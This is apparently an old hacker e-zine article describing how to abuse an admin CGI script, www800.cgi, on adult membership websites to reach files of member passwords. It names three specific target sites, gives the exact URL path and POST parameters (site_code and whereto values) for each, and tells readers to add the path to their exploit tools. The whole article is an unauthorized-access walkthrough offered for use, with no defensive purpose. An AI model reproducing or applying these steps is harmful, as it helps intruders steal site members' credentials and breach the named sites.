Redemption
| Last article | Table of contents | Next article |
|---|
| Last article | Table of contents | Next article |
|---|
www800.cgi by Energy
You'll be able to gain access to three (very little I must say) passfiles. The xploit is: /cgi-bin/wwwjoin/admin/www800.cgi So if you don't have it and want to add it. Once a victim is found you have to go to enter the url in your browser and take a look at the source if it contains the requiered infos for accessing the before mentioned passfiles. Three examples follow: http://www.twingirlsex.com/cgi-bin/wwwjoin/admin/www800.cgi Datas for the POST: site_code=TWIN whereto=view http://www.amateurgynecologist.com/cgi-bin/wwwjoin/admin/www800.cgi Datas for the POST: site_code=AMGY whereto=view http://www.girliegirl.com/cgi-bin/wwwjoin/admin/www800.cgi Datas for the POST: site_code=GGRL whereto=view Add /cgi-bin/wwwjoin/admin/www800.cgi to your list of xploits of your fav tool. If successful then 1) Grab the html from the site and CAREFULLY study it, you need to know the SITE_CODE and the WHERETO. 2) Do a POST with the url found with the following parameters: site_code=<SITE_CODE>&whereto=<WHERETO> Example: Go to http://www.twingirlsex.com/cgi-bin/wwwjoin/admin/www800.cgi and study the html code. From it you'll find that SITE_CODE is "TWIN" and the desired WHERETO is "View current members" so the parameters will be: site_codeTWIN&whereto=View current members *NOTE* Use the url you got while xploiting, not the one the source html refers to, i.e. the url of the POST must be: http://www.twingirlsex.com/cgi-bin/wwwjoin/admin/www800.cgi